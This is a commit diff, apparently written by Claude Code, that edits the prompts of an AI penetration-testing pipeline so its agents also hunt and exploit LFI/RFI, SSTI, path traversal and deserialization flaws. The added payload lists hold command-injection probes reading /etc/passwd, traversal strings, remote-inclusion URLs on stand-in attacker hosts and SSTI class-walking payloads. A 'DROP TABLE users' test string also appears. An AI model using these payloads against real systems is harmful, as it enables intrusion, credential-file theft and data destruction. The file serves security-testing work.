feat: expand injection analysis scope to cover LFI/RFI/SSTI/Path Traversal/Deserialization

Fixes responsibility gap where agents found vulnerabilities but rejected them as "out of scope" Changes: - vuln-injection.txt: Added LFI/RFI, SSTI, Path Traversal, Deserialization to scope - Updated role definition and objective - Added new vulnerability_type and slot_type enums - Added sink definitions and defense rules for new injection classes - Added witness payload examples - pre-recon-code.txt: Expanded sink hunter agent to find file/template/deserialize sinks - recon.txt: Updated Section 9 with clear injection source definitions for all types - exploit-injection.txt: Updated evidence template to handle all injection types Token-optimized: Condensed verbose sections while preserving critical guidance Addresses XBEN benchmark failures where LFI/SSTI/Path Traversal were detected but excluded from exploitation queues 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude <noreply@anthropic.com>
2026-02-12 17:22:50 +00:00 · 2025-10-31 10:40:34 -07:00
parent 52d7cc46a6
commit 4224d1c4f4
4 changed files with 38 additions and 77 deletions
--- a/prompts/pipeline-testing/exploit-injection.txt
+++ b/prompts/pipeline-testing/exploit-injection.txt
@@ -23,7 +23,7 @@ Use the save_deliverable MCP tool to create your evidence:

 Use `save_deliverable` MCP tool with:
 - `deliverable_type: "INJECTION_EVIDENCE"`
- `content: "# Injection Exploitation Evidence (Pipeline Test)\n\n**MCP Server Used:** {{MCP_SERVER}}\n**Test Site:** https://example.com\n**Screenshot:** injection-exploit-test.png\n**Status:** Browser isolation test successful\n\n## Exploitation Results\n- **Target:** Test injection vulnerability\n- **Method:** SQL injection via query parameter\n- **Evidence:** Successfully executed test payload `'; DROP TABLE users; --`\n- **Impact:** Demonstrated ability to manipulate database queries\n- **Proof:** Pipeline testing mode - simulated successful exploitation\n\n## Technical Details\n- **Vulnerability ID:** INJ-VULN-01\n- **Exploitation Status:** Simulated Success (Pipeline Test)\n- **MCP Instance:** {{MCP_SERVER}}"`
+- `content: "# Injection Exploitation Evidence (Pipeline Test)\n\n**MCP Server Used:** {{MCP_SERVER}}\n**Test Site:** https://example.com\n**Screenshot:** injection-exploit-test.png\n**Status:** Browser isolation test successful\n\n## Exploitation Results\n- **Target:** Test injection vulnerability\n- **Vulnerability Type:** SQLi | CommandInjection | LFI | RFI | SSTI | PathTraversal | InsecureDeserialization\n- **Method:** [Type-specific exploitation method]\n- **Evidence:** Successfully executed test payload\n- **Impact:** Demonstrated ability to manipulate [database queries | system commands | file system | template engine | deserialization]\n- **Proof:** Pipeline testing mode - simulated successful exploitation\n\n## Technical Details\n- **Vulnerability ID:** INJ-VULN-XX\n- **Exploitation Status:** Simulated Success (Pipeline Test)\n- **MCP Instance:** {{MCP_SERVER}}"`

 This will automatically create `deliverables/injection_exploitation_evidence.md`.

--- a/prompts/pre-recon-code.txt
+++ b/prompts/pre-recon-code.txt
@@ -110,7 +110,7 @@ Launch these three discovery agents simultaneously to understand the codebase st
 After Phase 1 completes, launch all three vulnerability-focused agents in parallel:

 4. **XSS/Injection Sink Hunter Agent**:
-   "Find all dangerous sinks where untrusted input could execute in browser contexts or system commands. Include XSS sinks (innerHTML, document.write, template injection), SQL injection points, command injection, and template injection. Provide render contexts and exact file locations. If no sinks are found, report that explicitly."
+   "Find all dangerous sinks where untrusted input could execute in browser contexts, system commands, file operations, template engines, or deserialization. Include XSS sinks (innerHTML, document.write), SQL injection points, command injection (exec, system), file inclusion/path traversal (fopen, include, require, readFile), template injection (render, compile, evaluate), and deserialization sinks (pickle, unserialize, readObject). Provide exact file locations with line numbers. If no sinks are found, report that explicitly."

 5. **SSRF/External Request Tracer Agent**:
   "Identify all locations where user input could influence server-side requests. Find HTTP clients, URL fetchers, webhook handlers, external API integrations, and file inclusion mechanisms. Map user-controllable request parameters with exact code locations. If no SSRF sinks are found, report that explicitly."
--- a/prompts/recon.txt
+++ b/prompts/recon.txt
@@ -342,50 +342,24 @@ Multi-step workflow endpoints that assume prior steps were completed.
 | Password Reset | `/api/auth/reset/confirm` | Reset token generated | Direct password reset |
 | Multi-step Forms | `/api/wizard/finalize` | Form data from previous steps | Skip validation steps |

-## 9. Injection Sources (Command Injection and SQL Injection)
+## 9. Injection Sources (Command Injection, SQL Injection, LFI/RFI, SSTI, Path Traversal, Deserialization)
 **TASK AGENT COORDINATION:** Launch a dedicated **Injection Source Tracer Agent** to identify these sources:
-"Find all command injection and SQL injection sources in the codebase. Trace user-controllable input from network-accessible endpoints to shell commands and database queries. For each source found, provide the complete data flow path from input to dangerous sink with exact file paths and line numbers."
+"Find all injection sources in the codebase: SQL injection, command injection, file inclusion/path traversal (LFI/RFI), server-side template injection (SSTI), and insecure deserialization. Trace user-controllable input from network-accessible endpoints to dangerous sinks (database queries, shell commands, file operations, template engines, deserialization functions). For each source found, provide the complete data flow path from input to dangerous sink with exact file paths and line numbers."

 **Network Surface Focus:** Only report injection sources that can be reached through the target web application's network interface. Exclude sources from local-only scripts, build tools, CLI applications, development utilities, or components that cannot be accessed via network requests to the deployed application.

-Create a list of network-accessible Command Injection and SQL injection sources using findings from the Injection Source Tracer Agent. Your output MUST include sufficient information to find the exact location found, such as filepaths with line numbers, or specific references for a downstream agent to find the location exactly.
-Command Injection Source: Any data that flows from a user-controlled origin into a program variable that is eventually interpolated into a shell or system command string (within network-accessible code paths).
-SQL Injection Source: Any user-controllable input that reaches a database query string (within network-accessible code paths). 
-Vulnerability Sources by Type
-		- 1. Command Injection Sources
-				- HTTP Request Data
-				- Query Parameters
-				- Form Fields
-				- Cookies
-				- HTTP Headers (e.g., User-Agent, X-Forwarded-For, Referer)
-				- File Uploads
-				- Filenames
-				- File Contents
-				- Environment Variables
-				- Inter-Process Communication (IPC)
-				- Data from Sockets
-				- Data from Pipes
-				- Data from Message Queues
-				- Configuration Files or Registry Entries
-				- Command-Line Arguments
-		- 2. SQL Injection Sources
-				- HTTP Request Data
-				- Query Parameters
-				- Form Fields (e.g., login, search)
-				- Cookies
-				- HTTP Headers
-				- File Uploads
-				- File Metadata (e.g., filename, filetype, description)
-				- Hidden Fields in HTML Forms
-				- URL Path Variables (e.g., in REST APIs)
-				- Stored Inputs
-				- Comments
-				- Blog Posts
-				- User Profile Fields
-				- Third-Party Integrations
-				- Webhook Data
-				- API Responses
-	CRITICAL: You must only include a source in this list if it matches the Command Injection and SQLI source definitions above (meets the requirement of tracing back to a DB query or a backend command execute).
+List network-accessible injection sources with exact file:line locations.
+
+**Injection Source Definitions:**
+- **Command Injection Source:** Data that flows from a user-controlled origin into a program variable that is eventually interpolated into a shell or system command string (within network-accessible code paths).
+- **SQL Injection Source:** User-controllable input that reaches a database query string (within network-accessible code paths).
+- **LFI/RFI/Path Traversal Source:** User-controllable input that influences file paths in file operations (read, include, require).
+- **SSTI Source:** User-controllable input embedded in template expressions or template content.
+- **Deserialization Source:** User-controllable input passed to deserialization functions.
+
+**Common Vectors:** HTTP params/body/headers/cookies, file uploads/names, URL paths, stored data, webhooks, sessions, message queues
+
+CRITICAL: Only include sources tracing to dangerous sinks (shell, DB, file ops, templates, deserialization).

 ---
 </deliverable_instructions>
--- a/prompts/vuln-injection.txt
+++ b/prompts/vuln-injection.txt
@@ -1,13 +1,11 @@
 <role>
-You are an Injection Analysis Specialist, an expert in **white-box code analysis and data flow tracing** for both SQL Injection (SQLi) and Command Injection vulnerabilities.
-Your primary function is to analyze how untrusted user input (sources) travels through the application to security-sensitive sinks, including the **database layer (SQLi sinks)** and the **operating system shell (command injection sinks)**.
+You are an Injection Analysis Specialist, an expert in **white-box code analysis and data flow tracing** for SQLi, Command Injection, LFI/RFI, SSTI, Path Traversal, and Deserialization vulnerabilities.
+Your primary function is to analyze how untrusted user input travels to security-sensitive sinks: database queries, shell commands, file operations, template engines, and deserialization functions.
 </role>

 <objective>
-Your mission is to identify and document every instance where untrusted user input insecurely influences the structure of a backend command. This includes:
-1. **SQL Context Mismatch:** Data is not sanitized correctly for the specific part of an SQL query it influences (e.g., a data value vs. a table name).
-2. **Command Injection Flaw:** Data is not escaped or validated correctly before being incorporated into a shell command executed by the operating system.
-Success criterion: A complete source-to-sink trace for every identified vulnerability (SQLi or Command Injection), detailing the path, the sanitizers encountered, the sink context, and the reason for the vulnerability, confirmed with a minimal, repeatable proof-of-concept.
+Your mission is to identify where untrusted input reaches dangerous sinks without proper defenses: SQL queries, shell commands, file operations, template engines, or deserialization functions.
+Success criterion: Complete source-to-sink traces detailing path, sanitizers, sink context, and vulnerability reason with a minimal proof-of-concept payload.
 </objective>

 <scope>
@@ -101,18 +99,18 @@ An **exploitable vulnerability** is a confirmed source-to-sink path where the en
  **Structure:** The `vulnerability` JSON object MUST follow this exact format:
 		{
 			"ID": "unique ID for each vulnerability (e.g., INJ-VULN-XX)",
-			"vulnerability_type": "SQLi | CommandInjection",
+			"vulnerability_type": "SQLi | CommandInjection | LFI | RFI | SSTI | PathTraversal | InsecureDeserialization",
 			"externally_exploitable": true | false,
 			"source": "param name & file:line.",
 			"combined_sources": "list if multiple sources were merged (with order).",
 			"path": "brief hop list (controller → fn → sink).",
 			"sink_call": "file:line and function/method.",
-			"slot_type": "SQL-val | SQL-like | SQL-num | SQL-enum | SQL-ident | CMD-argument | CMD-part-of-string.",
+			"slot_type": "SQL-val | SQL-like | SQL-num | SQL-enum | SQL-ident | CMD-argument | CMD-part-of-string | FILE-path | FILE-include | TEMPLATE-expression | DESERIALIZE-object | PATH-component",
 			"sanitization_observed": "name & file:line (all of them, in order).",
 			"concat_occurrences": "each concat/format/join with file:line; flag those after sanitization.",
 			"verdict": "safe | vulnerable.",
 			"mismatch_reason": "if vulnerable, 1–2 lines in plain language.",
-			"witness_payload": "minimal input you'd use later to show structure influence (e.g., ' for SQLi, ; ls -la for Command Injection).",
+			"witness_payload": "minimal input you'd use later to show structure influence (e.g., ' for SQLi, ; ls -la for Command Injection, ../../../../etc/passwd for LFI, {{7*7}} for SSTI).",
 			"confidence": "high | med | low.",
 			"notes": "assumptions, untraversed branches, anything unusual."
 		}
@@ -136,27 +134,15 @@ An **exploitable vulnerability** is a confirmed source-to-sink path where the en
 		      - **A. The full sequence of transformations:** Document all assignments, function calls, and string operations from the controller to the data access layer.
 		      - **B. The ordered list of sanitizers on that path:** Record every sanitization function encountered *on this specific path*, including its name, file:line, and type (e.g., parameter binding, type casting).
 		      - **C. All concatenations on that path:** Note every string concatenation or format operation involving the tainted data. Crucially, flag any concatenation that occurs *after* a sanitization step on this path.
-  - **3) Detect sinks (Security-Sensitive Execution Points) and label input slots**
-		- **SQLi Sinks:** DB driver calls, ORM "raw SQL", string-built SQL, stored procedures.
-		- **Command Injection Sinks:** Calls to `os.system`, `subprocess.run`, `exec`, `eval`, or any library function that passes arguments to a system shell.
-		- For each sink, identify the part(s) the traced input influences and label the slot type:
-				- **SQL - data value:** (e.g., RHS of `=`, items in `IN (…)`)
-				- **SQL - like-pattern:** (RHS of `LIKE`)
-				- **SQL - numeric:** (`LIMIT`, `OFFSET`, counters)
-				- **SQL - keyword:** (e.g., `ASC`/`DESC`)
-				- **SQL - identifier:** (column/table name)
-		- **CMD - argument:** An entire, properly quoted argument to a command.
-		- **CMD - part-of-string:** Part of a command string that will be parsed by the shell, often after concatenation.
- **4) Decide if sanitization matches the sink's context (core rule)**
-		- **For SQL Sinks:**
-		- **data value slot:** parameter binding (or strict parse → typed bind). Mismatch: any concat; HTML/URL escaping; regex "sanitization".
-		- **like-pattern slot:** bind **and** escape `%/_`; use `ESCAPE`. Mismatch: raw `%/_`; only trimming; binding without wildcard controls.
-		- **numeric slot:** parse/cast to integer **before** binding. Mismatch: numeric strings; concatenation; casting after concat.
-		- **SQL syntax — keyword (enum):** whitelist from a tiny set (e.g., `ASC|DESC`). Mismatch: free text; regex filters; only lowercasing.
-		- **SQL syntax — identifier:** whitelist/map to fixed column/table names. Mismatch: trying to "escape" identifiers; assuming binds help here.
-		- **For Command Injection Sinks:**
-		- **argument slot:** Use of command argument arrays (e.g., `subprocess.run(['ls', '-l', userInput])`) where the shell is not invoked (`shell=False`). Mismatch: passing a single concatenated string to a command execution function that uses a shell.
-		- **part-of-string slot:** Strict, whitelist-based validation or shell-specific escaping (e.g., `shlex.quote()`). Mismatch: lack of escaping, blacklisting special characters (e.g., `|;&$`), or any form of direct string concatenation into a command passed to a shell.
+  - **3) Detect sinks and label slot types**
+		- **SQLi:** DB calls, raw SQL, string-built queries | **Command:** `exec`, `system`, `subprocess`, shell invocations | **File:** `include`, `require`, `fopen`, `readFile` | **SSTI:** template `render`/`compile` with user content | **Deserialize:** `pickle.loads`, `unserialize`, `readObject`, `yaml.load`
+		- **Slot labels:** SQL-val/like/num/enum/ident | CMD-argument/part-of-string | FILE-path/include | TEMPLATE-expression | DESERIALIZE-object | PATH-component
+- **4) Match sanitization to sink context**
+		- **SQL:** Binds for val/like/num; whitelist for enum/ident. Mismatch: concat, regex, wrong slot defense
+		- **Command:** Array args (`shell=False`) OR `shlex.quote()`. Mismatch: concat, blacklist, `shell=True`
+		- **File/Path:** Whitelist paths OR `resolve()` + boundary check. Mismatch: concat, `../` blacklist, no protocol check
+		- **SSTI:** Sandboxed context + autoescape; no user input in expressions. Mismatch: concat, weak sandbox
+		- **Deserialize:** Trusted sources only; safe formats + HMAC. Mismatch: untrusted input, pickle/unserialize
  - **5) Make the call (vulnerability or safe)**
    - **Vulnerable** if any tainted input reaches a slot with no defense or the wrong one.
    - Include a short rationale (e.g., "context mismatch: regex escape on ORDER BY keyword slot").
@@ -209,11 +195,12 @@ An **exploitable vulnerability** is a confirmed source-to-sink path where the en
 <witness_inputs_for_later>
 **Hold for the exploit phase (do not execute during analysis)**

-* Error shape checkers: `'` `"` `)` `;` `\`
-* Boolean toggles: `... AND 1=1` vs `... AND 1=2`
-* Timing toggles: `... AND SLEEP(5)` or database-specific delay
-* UNION probes: `... UNION SELECT NULL ...`
-* Comment terminators: `--` `#` `/**/`
+* **SQLi:** Error shape checkers: `'` `"` `)` `;` `\` | Boolean toggles: `... AND 1=1` vs `... AND 1=2` | Timing toggles: `... AND SLEEP(5)` | UNION probes: `... UNION SELECT NULL ...` | Comment terminators: `--` `#` `/**/`
+* **Command Injection:** `; ls -la` | `| whoami` | `\`id\`` | `$(cat /etc/passwd)` | `& dir` | `|| uname -a`
+* **LFI/Path Traversal:** `../../../../etc/passwd` | `....//....//etc/passwd` | `..%252f..%252fetc/passwd` | `/etc/passwd%00` | `....\/....\/windows/win.ini`
+* **RFI:** `http://attacker.com/shell.txt` | `//attacker.com/evil.php` | `ftp://attacker.com/backdoor.php`
+* **SSTI:** `{{7*7}}` | `${7*7}` | `<%= 7*7 %>` | `{{config.items()}}` | `{{''.__class__.__mro__[1].__subclasses__()}}` | `#{7*7}`
+* **Deserialization:** Serialized object payloads specific to language (e.g., Python pickle with `__reduce__`, Java gadget chains, PHP `O:` notation with magic methods)
 * Keep these as examples under `witness_payload` in findings; they are not required to classify a path as vulnerable during analysis.
 </witness_inputs_for_later>